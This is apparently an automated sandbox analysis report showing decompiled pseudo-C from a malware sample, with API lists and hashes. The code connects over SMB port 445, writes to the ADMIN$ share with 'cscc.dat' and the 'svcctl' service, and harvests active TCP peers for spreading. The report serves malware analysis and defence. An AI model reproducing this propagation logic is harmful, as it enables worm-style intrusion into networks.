                                                                                                                                                              				short _v38;
                                                                                                                                                              				char _v40;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              				int _t56;
                                                                                                                                                              				short _t60;
                                                                                                                                                              				char* _t61;
                                                                                                                                                              				void* _t64;
                                                                                                                                                              				void* _t66;
                                                                                                                                                              				signed int _t70;
                                                                                                                                                              				int _t84;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              				void* _t89;
                                                                                                                                                              
                                                                                                                                                              				_t85 = __ecx;
                                                                                                                                                              				_v20 = 0xbadf00d;
                                                                                                                                                              				_t89 = HeapAlloc(GetProcessHeap(), 8, 0x24);
                                                                                                                                                              				_v16 = _t89;
                                                                                                                                                              				if(_t89 == 0) {
                                                                                                                                                              					L19:
                                                                                                                                                              					return _v20;
                                                                                                                                                              				}
                                                                                                                                                              				 *((intOrPtr*)(_t89 + 4)) = 0x424d53fe;
                                                                                                                                                              				 *((char*)(_t89 + 0xd)) = 0x18;
                                                                                                                                                              				 *((short*)(_t89 + 0xe)) = 0x4801;
                                                                                                                                                              				 *((short*)(_t89 + 0x1e)) = 0xfeff;
                                                                                                                                                              				_t54 = rand() & 0x80001fff;
                                                                                                                                                              				if(_t54 < 0) {
                                                                                                                                                              					_t54 = (_t54 - 0x00000001 | 0xffffe000) + 1;
                                                                                                                                                              				}
                                                                                                                                                              				 *((short*)(_t89 + 0x22)) = _t54 + 0x1000;
                                                                                                                                                              				 *((intOrPtr*)(_t89 + 9)) = 0x300;
                                                                                                                                                              				_t56 = rand();
                                                                                                                                                              				 *(_t89 + 0x10) = _t56;
                                                                                                                                                              				__imp__#23(2, 1, 6); // executed
                                                                                                                                                              				_t84 = _t56;
                                                                                                                                                              				if(_t84 == 0xffffffff) {
                                                                                                                                                              					L18:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t89);
                                                                                                                                                              					goto L19;
                                                                                                                                                              				}
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				_t60 = 2;
                                                                                                                                                              				_v40 = _t60;
                                                                                                                                                              				__imp__#9(0x1bd);
                                                                                                                                                              				_v38 = _t60;
                                                                                                                                                              				__imp__#11(_a4);
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				_t61 =  &_v40;
                                                                                                                                                              				__imp__#4(_t84, _t61, 0x10); // executed
                                                                                                                                                              				if(_t61 == 0xffffffff) {
                                                                                                                                                              					L16:
                                                                                                                                                              					_v20 = 0xc0c0c0c;
                                                                                                                                                              					L17:
                                                                                                                                                              					__imp__#3(_t84);
                                                                                                                                                              					goto L18;
                                                                                                                                                              				}
                                                                                                                                                              				_t64 = E04E21CA3(_t84,  &_v16,  &_v20); // executed
                                                                                                                                                              				if(_t64 == 0) {
                                                                                                                                                              					_t89 = _v16;
                                                                                                                                                              					goto L16;
                                                                                                                                                              				}
                                                                                                                                                              				_v24 = _v24 & 0x00000000;
                                                                                                                                                              				_t88 =  &_v16;
                                                                                                                                                              				_t66 = E04E22191( &_v16, _t84, _a4,  &_v24); // executed
                                                                                                                                                              				if(_t66 == 0) {
                                                                                                                                                              					_v20 = 0xc0c0c0c;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t90 = _v16;
                                                                                                                                                              					_t70 = E04E246C7(_t85, _t84, _a4, _v16,  &_v24, _v20); // executed
                                                                                                                                                              					_v20 = _t70;
                                                                                                                                                              					E04E221DC(_t84, _t88,  &_v24); // executed
                                                                                                                                                              					if(_v20 == 0) {
                                                                                                                                                              						_v20 = 0xf0f0f0f;
                                                                                                                                                              						if(E04E21EB9(_t84, _t88, _a4, "ADMIN$") != 0 && E04E22054(_t84, _t90,  &_v12, "cscc.dat", 1) == 0 && E04E24AB5(_a20, _t85, _t84, _t90,  &_v24, _a12, _a16) != 0 && E04E2516B(_t85, _t84, _t90, _a4, _a8, _a12) != 0) {
                                                                                                                                                              							_v20 = _v20 & 0x00000000;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				E04E21DD1(_t85, _t84,  &_v16); // executed
                                                                                                                                                              				_t89 = _v16;
                                                                                                                                                              				goto L17;
                                                                                                                                                              			}





















                                                                                                                                                              0x04e25337
                                                                                                                                                              0x04e25344
                                                                                                                                                              0x04e25358
                                                                                                                                                              0x04e2535a
                                                                                                                                                              0x04e2535f
                                                                                                                                                              0x04e254fd
                                                                                                                                                              0x04e25504
                                                                                                                                                              0x04e25504
                                                                                                                                                              0x04e2536b
                                                                                                                                                              0x04e25372
                                                                                                                                                              0x04e2537b
                                                                                                                                                              0x04e25384
                                                                                                                                                              0x04e2538a
                                                                                                                                                              0x04e2538f
                                                                                                                                                              0x04e25397
                                                                                                                                                              0x04e25397
                                                                                                                                                              0x04e2539d
                                                                                                                                                              0x04e253a1
                                                                                                                                                              0x04e253a8
                                                                                                                                                              0x04e253b0
                                                                                                                                                              0x04e253b4
                                                                                                                                                              0x04e253ba
                                                                                                                                                              0x04e253bf
                                                                                                                                                              0x04e254ed
                                                                                                                                                              0x04e254f7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e254f7
                                                                                                                                                              0x04e253ca
                                                                                                                                                              0x04e253cb
                                                                                                                                                              0x04e253cc
                                                                                                                                                              0x04e253cf
                                                                                                                                                              0x04e253d0
                                                                                                                                                              0x04e253d6
                                                                                                                                                              0x04e253da
                                                                                                                                                              0x04e253e3
                                                                                                                                                              0x04e253e7
                                                                                                                                                              0x04e253ed
                                                                                                                                                              0x04e253f2
                                                                                                                                                              0x04e253f7
                                                                                                                                                              0x04e25400
                                                                                                                                                              0x04e254df
                                                                                                                                                              0x04e254df
                                                                                                                                                              0x04e254e6
                                                                                                                                                              0x04e254e7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e254e7
                                                                                                                                                              0x04e2540f
                                                                                                                                                              0x04e25416
                                                                                                                                                              0x04e254dc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e254dc
                                                                                                                                                              0x04e2541c
                                                                                                                                                              0x04e25427
                                                                                                                                                              0x04e2542b
                                                                                                                                                              0x04e25432
                                                                                                                                                              0x04e254c6
                                                                                                                                                              0x04e25438
                                                                                                                                                              0x04e2543b
                                                                                                                                                              0x04e25447
                                                                                                                                                              0x04e2544c
                                                                                                                                                              0x04e25457
                                                                                                                                                              0x04e25460
                                                                                                                                                              0x04e2546e
                                                                                                                                                              0x04e2547c
                                                                                                                                                              0x04e254c0
                                                                                                                                                              0x04e254c0
                                                                                                                                                              0x04e2547c
                                                                                                                                                              0x04e25460
                                                                                                                                                              0x04e254d2
                                                                                                                                                              0x04e254d7
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,74656840,00000000,?,?,?,?,04E2943A,?), ref: 04E2534B
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,04E2943A,?), ref: 04E25352
                                                                                                                                                              • rand.MSVCRT ref: 04E25388
                                                                                                                                                              • rand.MSVCRT ref: 04E253A8
                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 04E253B4
                                                                                                                                                              • htons.WS2_32(000001BD), ref: 04E253DA
                                                                                                                                                              • inet_addr.WS2_32(?), ref: 04E253E7
                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 04E253F7
                                                                                                                                                                • Part of subcall function 04E2516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 04E251D3
                                                                                                                                                                • Part of subcall function 04E2516B: HeapAlloc.KERNEL32(00000000), ref: 04E251DC
                                                                                                                                                                • Part of subcall function 04E2516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04E25205
                                                                                                                                                                • Part of subcall function 04E2516B: HeapAlloc.KERNEL32(00000000), ref: 04E25208
                                                                                                                                                                • Part of subcall function 04E2516B: rand.MSVCRT ref: 04E2521B
                                                                                                                                                                • Part of subcall function 04E2516B: rand.MSVCRT ref: 04E25226
                                                                                                                                                                • Part of subcall function 04E2516B: rand.MSVCRT ref: 04E2522F
                                                                                                                                                                • Part of subcall function 04E2516B: sprintf.MSVCRT ref: 04E25246
                                                                                                                                                                • Part of subcall function 04E2516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,04E2943A), ref: 04E25252
                                                                                                                                                                • Part of subcall function 04E2516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04E2943A), ref: 04E25255
                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 04E254E7
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04E2943A,?), ref: 04E254F0
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,04E2943A,?), ref: 04E254F7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
                                                                                                                                                              • String ID: Oet Uet0Xet$ADMIN$$cscc.dat
                                                                                                                                                              • API String ID: 228017060-2485865258
                                                                                                                                                              • Opcode ID: 7366a376e7e227f12dda5c86a89887cddb077659a6c74f716d663070331bcea1
                                                                                                                                                              • Instruction ID: d2534abda2a8b163de5b6df123b024c1ad8bd531b097af6aed3ddf30e2539e3a
                                                                                                                                                              • Opcode Fuzzy Hash: 7366a376e7e227f12dda5c86a89887cddb077659a6c74f716d663070331bcea1
                                                                                                                                                              • Instruction Fuzzy Hash: D7515E71900729BBDF209FA4CE44EEFBBB9FF0835AF005505BA16A7251D775AA04CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 509 4e2733c-4e27355 LoadLibraryW 510 4e27425-4e27429 509->510 511 4e2735b-4e2736d GetProcAddress 509->511 512 4e27373-4e27392 RtlAllocateHeap 511->512 513 4e27414 GetLastError 511->513 514 4e2741a-4e27424 FreeLibrary 512->514 516 4e27398-4e273ac GetExtendedTcpTable 512->516 513->514 514->510 517 4e27402-4e27412 RtlFreeHeap 516->517 518 4e273ae-4e273b5 516->518 517->514 518->517 519 4e273b7 518->519 521 4e273ba-4e273be 519->521 522 4e273c0-4e273ed wsprintfW call 4e26b95 521->522 523 4e273f5-4e27400 521->523 525 4e273f2 522->525 523->517 523->521 525->523
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E04E2733C(intOrPtr _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				struct HINSTANCE__* _v20;
                                                                                                                                                              				short _v84;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				struct HINSTANCE__* _t20;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				signed int _t29;
                                                                                                                                                              				void* _t41;
                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                              				signed char* _t47;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				void* _t52;
                                                                                                                                                              
                                                                                                                                                              				_t41 = 0;
                                                                                                                                                              				_t20 = LoadLibraryW(L"iphlpapi.dll");
                                                                                                                                                              				_v20 = _t20;
                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                              					_t45 = GetProcAddress(_t20, "GetExtendedTcpTable");
                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                              						GetLastError();
                                                                                                                                                              					} else {
                                                                                                                                                              						_v12 = 0x100000;
                                                                                                                                                              						_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x100000); // executed
                                                                                                                                                              						_t50 = _t27;
                                                                                                                                                              						_v16 = _t50;
                                                                                                                                                              						if(_t50 != 0) {
                                                                                                                                                              							_t29 =  *_t45(_t50,  &_v12, 0, 2, 1, 0); // executed
                                                                                                                                                              							asm("sbb ebx, ebx");
                                                                                                                                                              							_t41 =  ~_t29 + 1;
                                                                                                                                                              							if(_t41 != 0) {
                                                                                                                                                              								_v8 = _v8 & 0x00000000;
                                                                                                                                                              								if( *_t50 > 0) {
                                                                                                                                                              									_t7 = _t50 + 0x12; // 0x12
                                                                                                                                                              									_t47 = _t7;
                                                                                                                                                              									do {
                                                                                                                                                              										if( *((intOrPtr*)(_t47 - 0xe)) == 5) {
                                                                                                                                                              											wsprintfW( &_v84, L"%u.%u.%u.%u",  *(_t47 - 2) & 0x000000ff,  *(_t47 - 1) & 0x000000ff,  *_t47 & 0x000000ff, _t47[1] & 0x000000ff);
                                                                                                                                                              											_t52 = _t52 + 0x18;
                                                                                                                                                              											E04E26B95( &_v84, 0, _a4); // executed
                                                                                                                                                              											_t50 = _v16;
                                                                                                                                                              										}
                                                                                                                                                              										_v8 = _v8 + 1;
                                                                                                                                                              										_t47 =  &(_t47[0x14]);
                                                                                                                                                              									} while (_v8 <  *_t50);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							RtlFreeHeap(GetProcessHeap(), 0, _t50); // executed
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					FreeLibrary(_v20);
                                                                                                                                                              				}
                                                                                                                                                              				return _t41;
                                                                                                                                                              			}

















                                                                                                                                                              0x04e27348
                                                                                                                                                              0x04e2734a
                                                                                                                                                              0x04e27350
                                                                                                                                                              0x04e27355
                                                                                                                                                              0x04e27369
                                                                                                                                                              0x04e2736d
                                                                                                                                                              0x04e27414
                                                                                                                                                              0x04e27373
                                                                                                                                                              0x04e2737b
                                                                                                                                                              0x04e27385
                                                                                                                                                              0x04e2738b
                                                                                                                                                              0x04e2738d
                                                                                                                                                              0x04e27392
                                                                                                                                                              0x04e273a3
                                                                                                                                                              0x04e273a9
                                                                                                                                                              0x04e273ab
                                                                                                                                                              0x04e273ac
                                                                                                                                                              0x04e273ae
                                                                                                                                                              0x04e273b5
                                                                                                                                                              0x04e273b7
                                                                                                                                                              0x04e273b7
                                                                                                                                                              0x04e273ba
                                                                                                                                                              0x04e273be
                                                                                                                                                              0x04e273dc
                                                                                                                                                              0x04e273e2
                                                                                                                                                              0x04e273ed
                                                                                                                                                              0x04e273f2
                                                                                                                                                              0x04e273f2
                                                                                                                                                              0x04e273f5
                                                                                                                                                              0x04e273fb
                                                                                                                                                              0x04e273fe
                                                                                                                                                              0x04e273ba
                                                                                                                                                              0x04e273b5
                                                                                                                                                              0x04e2740c
                                                                                                                                                              0x04e2740c
                                                                                                                                                              0x04e27392
                                                                                                                                                              0x04e2741d
                                                                                                                                                              0x04e27424
                                                                                                                                                              0x04e27429

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 04E2734A
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04E27363
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00100000), ref: 04E2737E
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04E27385
                                                                                                                                                              • GetExtendedTcpTable.IPHLPAPI(00000000,?,00000000,00000002,00000001,00000000), ref: 04E273A3
                                                                                                                                                              • wsprintfW.USER32 ref: 04E273DC
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04E27405
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 04E2740C
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04E27856), ref: 04E27414
                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 04E2741D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorExtendedLastLoadProcTablewsprintf
                                                                                                                                                              • String ID: Oet Uet0Xet$%u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                                                                                                                                              • API String ID: 2031097080-2088648562
                                                                                                                                                              • Opcode ID: f981c755663bf3459a8a22e5b336a9338b6b9bc6080423b6d87b486f754f201e
                                                                                                                                                              • Instruction ID: a9f640f0bf5df7e3a28a692d09e695f0d52e3daec50fc377444db43f7a42af53
                                                                                                                                                              • Opcode Fuzzy Hash: f981c755663bf3459a8a22e5b336a9338b6b9bc6080423b6d87b486f754f201e
                                                                                                                                                              • Instruction Fuzzy Hash: 98219472900225ABDB215FE58E48FAFBBBCEF48306F140565F541E6145D779ED01CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 526 4e21eb9-4e21ee2 GetProcessHeap HeapAlloc 527 4e2204b-4e22051 526->527 528 4e21ee8-4e21eeb 526->528 529 4e21eee-4e21ef3 528->529 529->529 530 4e21ef5-4e21efd 529->530 531 4e21f00-4e21f05 530->531 531->531 532 4e21f07-4e21f28 GetProcessHeap HeapAlloc 531->532 533 4e22038-4e2204a HeapFree 532->533 534 4e21f2e-4e21f77 htons 532->534 533->527 535 4e21f79-4e21f81 534->535 535->535 536 4e21f83-4e21f85 535->536 538 4e21f88-4e21f8d 536->538 538->538 539 4e21f8f-4e21f9b 538->539 540 4e21f9e-4e21fa3 539->540 540->540 541 4e21fa5-4e21fae 540->541 542 4e21fb0-4e21fb8 541->542 542->542 543 4e21fba-4e21fbc 542->543 544 4e21fbf-4e21fc4 543->544 544->544 545 4e21fc6-4e21fcd 544->545 546 4e21fd0-4e21fd5 545->546 546->546 547 4e21fd7-4e21ff9 send 546->547 548 4e21ffb-4e22010 recv 547->548 549 4e22028-4e22032 HeapFree 547->549 548->549 550 4e22012-4e22015 548->550 549->533 550->549 551 4e22017-4e22024 550->551 551->549
                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                              			E04E21EB9(intOrPtr _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				signed short _v20;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				intOrPtr* _t51;
                                                                                                                                                              				intOrPtr* _t53;
                                                                                                                                                              				signed short _t56;
                                                                                                                                                              				long _t58;
                                                                                                                                                              				void* _t66;
                                                                                                                                                              				void* _t71;
                                                                                                                                                              				intOrPtr* _t72;
                                                                                                                                                              				intOrPtr* _t74;
                                                                                                                                                              				void* _t77;
                                                                                                                                                              				intOrPtr* _t78;
                                                                                                                                                              				intOrPtr* _t80;
                                                                                                                                                              				void* _t82;
                                                                                                                                                              				void* _t88;
                                                                                                                                                              				intOrPtr _t89;
                                                                                                                                                              				void* _t90;
                                                                                                                                                              				signed int _t91;
                                                                                                                                                              				char _t93;
                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                              				short _t95;
                                                                                                                                                              				intOrPtr _t96;
                                                                                                                                                              				char _t97;
                                                                                                                                                              				intOrPtr _t98;
                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                              				void* _t101;
                                                                                                                                                              				intOrPtr _t102;
                                                                                                                                                              				intOrPtr* _t103;
                                                                                                                                                              				void* _t104;
                                                                                                                                                              				void* _t106;
                                                                                                                                                              				void* _t112;
                                                                                                                                                              				intOrPtr* _t118;
                                                                                                                                                              				void* _t119;
                                                                                                                                                              				void* _t120;
                                                                                                                                                              				intOrPtr* _t121;
                                                                                                                                                              				void* _t122;
                                                                                                                                                              				void* _t124;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t49 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v16 = _t49;
                                                                                                                                                              				if(_t49 == 0) {
                                                                                                                                                              					L24:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t51 = _a12;
                                                                                                                                                              				_t101 = _t51 + 1;
                                                                                                                                                              				do {
                                                                                                                                                              					_t89 =  *_t51;
                                                                                                                                                              					_t51 = _t51 + 1;
                                                                                                                                                              				} while (_t89 != 0);
                                                                                                                                                              				_t90 = _t51 - _t101;
                                                                                                                                                              				_t53 = _a16;
                                                                                                                                                              				_t106 = _t53 + 1;
                                                                                                                                                              				do {
                                                                                                                                                              					_t102 =  *_t53;
                                                                                                                                                              					_t53 = _t53 + 1;
                                                                                                                                                              				} while (_t102 != 0);
                                                                                                                                                              				_t56 = _t90 + _t53 - _t106 + 0x0000000b & 0x0000ffff;
                                                                                                                                                              				_v20 = _t56;
                                                                                                                                                              				_t58 = (_t56 & 0x0000ffff) + 0x2f;
                                                                                                                                                              				_v12 = _t58;
                                                                                                                                                              				_t88 = HeapAlloc(GetProcessHeap(), 8, _t58);
                                                                                                                                                              				if(_t88 == 0) {
                                                                                                                                                              					L23:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                              					goto L24;
                                                                                                                                                              				}
                                                                                                                                                              				_t91 = 9;
                                                                                                                                                              				_t66 = memcpy(_t88,  *_a8, _t91 << 2);
                                                                                                                                                              				__imp__#9(_v12 + 0xfffffffc);
                                                                                                                                                              				_t103 = _a12;
                                                                                                                                                              				 *(_t88 + 2) = _t66;
                                                                                                                                                              				 *((short*)(_t88 + 0x2b)) = 1;
                                                                                                                                                              				 *((short*)(_t88 + 0x2d)) = _v20;
                                                                                                                                                              				 *((char*)(_t88 + 8)) = 0x75;
                                                                                                                                                              				 *((short*)(_t88 + 0x24)) = 0xff04;
                                                                                                                                                              				asm("movsw");
                                                                                                                                                              				_t22 = _t88 + 0x32; // 0x32
                                                                                                                                                              				asm("movsb");
                                                                                                                                                              				_t118 = _t103;
                                                                                                                                                              				_t71 = _t22 - _t103;
                                                                                                                                                              				do {
                                                                                                                                                              					_t93 =  *_t118;
                                                                                                                                                              					 *((char*)(_t71 + _t118)) = _t93;
                                                                                                                                                              					_t118 = _t118 + 1;
                                                                                                                                                              				} while (_t93 != 0);
                                                                                                                                                              				_t72 = _t103;
                                                                                                                                                              				_t119 = _t72 + 1;
                                                                                                                                                              				do {
                                                                                                                                                              					_t94 =  *_t72;
                                                                                                                                                              					_t72 = _t72 + 1;
                                                                                                                                                              				} while (_t94 != 0);
                                                                                                                                                              				_t95 = 0x5c;
                                                                                                                                                              				 *((short*)(_t72 - _t119 + _t88 + 0x32)) = _t95;
                                                                                                                                                              				_t74 = _t103;
                                                                                                                                                              				_t120 = _t74 + 1;
                                                                                                                                                              				do {
                                                                                                                                                              					_t96 =  *_t74;
                                                                                                                                                              					_t74 = _t74 + 1;
                                                                                                                                                              				} while (_t96 != 0);
                                                                                                                                                              				_t121 = _a16;
                                                                                                                                                              				_t77 = _t74 - _t120 + _t88 + 0x33 - _t121;
                                                                                                                                                              				do {
                                                                                                                                                              					_t97 =  *_t121;
                                                                                                                                                              					 *((char*)(_t77 + _t121)) = _t97;
                                                                                                                                                              					_t121 = _t121 + 1;
                                                                                                                                                              				} while (_t97 != 0);
                                                                                                                                                              				_t78 = _t103;
                                                                                                                                                              				_t104 = _t78 + 1;
                                                                                                                                                              				do {
                                                                                                                                                              					_t98 =  *_t78;
                                                                                                                                                              					_t78 = _t78 + 1;
                                                                                                                                                              				} while (_t98 != 0);
                                                                                                                                                              				_t122 = _t78 - _t104;
                                                                                                                                                              				_t80 = _a16;
                                                                                                                                                              				_t112 = _t80 + 1;
                                                                                                                                                              				do {
                                                                                                                                                              					_t99 =  *_t80;
                                                                                                                                                              					_t80 = _t80 + 1;
                                                                                                                                                              				} while (_t99 != 0);
                                                                                                                                                              				_t82 = _t80 - _t112 + _t122;
                                                                                                                                                              				asm("movsd");
                                                                                                                                                              				asm("movsw");
                                                                                                                                                              				__imp__#19(_a4, _t88, _v12, 0); // executed
                                                                                                                                                              				if(_t82 > 0) {
                                                                                                                                                              					_t124 = _v16;
                                                                                                                                                              					__imp__#16(_a4, _t124, 0xffff, 0); // executed
                                                                                                                                                              					if(_t82 > 0 &&  *((intOrPtr*)(_t124 + 9)) == 0) {
                                                                                                                                                              						 *((short*)( *_a8 + 0x1c)) =  *((intOrPtr*)(_t124 + 0x1c));
                                                                                                                                                              						_v5 = 1;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t88);
                                                                                                                                                              				goto L23;
                                                                                                                                                              			}











































                                                                                                                                                              0x04e21ece
                                                                                                                                                              0x04e21edb
                                                                                                                                                              0x04e21edd
                                                                                                                                                              0x04e21ee2
                                                                                                                                                              0x04e2204b
                                                                                                                                                              0x04e22051
                                                                                                                                                              0x04e22051
                                                                                                                                                              0x04e21ee8
                                                                                                                                                              0x04e21eeb
                                                                                                                                                              0x04e21eee
                                                                                                                                                              0x04e21eee
                                                                                                                                                              0x04e21ef0
                                                                                                                                                              0x04e21ef1
                                                                                                                                                              0x04e21ef7
                                                                                                                                                              0x04e21ef9
                                                                                                                                                              0x04e21efd
                                                                                                                                                              0x04e21f00
                                                                                                                                                              0x04e21f00
                                                                                                                                                              0x04e21f02
                                                                                                                                                              0x04e21f03
                                                                                                                                                              0x04e21f0d
                                                                                                                                                              0x04e21f10
                                                                                                                                                              0x04e21f16
                                                                                                                                                              0x04e21f1c
                                                                                                                                                              0x04e21f24
                                                                                                                                                              0x04e21f28
                                                                                                                                                              0x04e22038
                                                                                                                                                              0x04e22044
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2204a
                                                                                                                                                              0x04e21f38
                                                                                                                                                              0x04e21f3f
                                                                                                                                                              0x04e21f41
                                                                                                                                                              0x04e21f47
                                                                                                                                                              0x04e21f4a
                                                                                                                                                              0x04e21f51
                                                                                                                                                              0x04e21f59
                                                                                                                                                              0x04e21f5d
                                                                                                                                                              0x04e21f61
                                                                                                                                                              0x04e21f6f
                                                                                                                                                              0x04e21f71
                                                                                                                                                              0x04e21f74
                                                                                                                                                              0x04e21f75
                                                                                                                                                              0x04e21f77
                                                                                                                                                              0x04e21f79
                                                                                                                                                              0x04e21f79
                                                                                                                                                              0x04e21f7b
                                                                                                                                                              0x04e21f7e
                                                                                                                                                              0x04e21f7f
                                                                                                                                                              0x04e21f83
                                                                                                                                                              0x04e21f85
                                                                                                                                                              0x04e21f88
                                                                                                                                                              0x04e21f88
                                                                                                                                                              0x04e21f8a
                                                                                                                                                              0x04e21f8b
                                                                                                                                                              0x04e21f93
                                                                                                                                                              0x04e21f94
                                                                                                                                                              0x04e21f99
                                                                                                                                                              0x04e21f9b
                                                                                                                                                              0x04e21f9e
                                                                                                                                                              0x04e21f9e
                                                                                                                                                              0x04e21fa0
                                                                                                                                                              0x04e21fa1
                                                                                                                                                              0x04e21fa7
                                                                                                                                                              0x04e21fae
                                                                                                                                                              0x04e21fb0
                                                                                                                                                              0x04e21fb0
                                                                                                                                                              0x04e21fb2
                                                                                                                                                              0x04e21fb5
                                                                                                                                                              0x04e21fb6
                                                                                                                                                              0x04e21fba
                                                                                                                                                              0x04e21fbc
                                                                                                                                                              0x04e21fbf
                                                                                                                                                              0x04e21fbf
                                                                                                                                                              0x04e21fc1
                                                                                                                                                              0x04e21fc2
                                                                                                                                                              0x04e21fc8
                                                                                                                                                              0x04e21fca
                                                                                                                                                              0x04e21fcd
                                                                                                                                                              0x04e21fd0
                                                                                                                                                              0x04e21fd0
                                                                                                                                                              0x04e21fd2
                                                                                                                                                              0x04e21fd3
                                                                                                                                                              0x04e21fd9
                                                                                                                                                              0x04e21fe4
                                                                                                                                                              0x04e21fe5
                                                                                                                                                              0x04e21ff1
                                                                                                                                                              0x04e21ff9
                                                                                                                                                              0x04e21ffb
                                                                                                                                                              0x04e22008
                                                                                                                                                              0x04e22010
                                                                                                                                                              0x04e22020
                                                                                                                                                              0x04e22024
                                                                                                                                                              0x04e22024
                                                                                                                                                              0x04e22010
                                                                                                                                                              0x04e22032
                                                                                                                                                              0x00000000

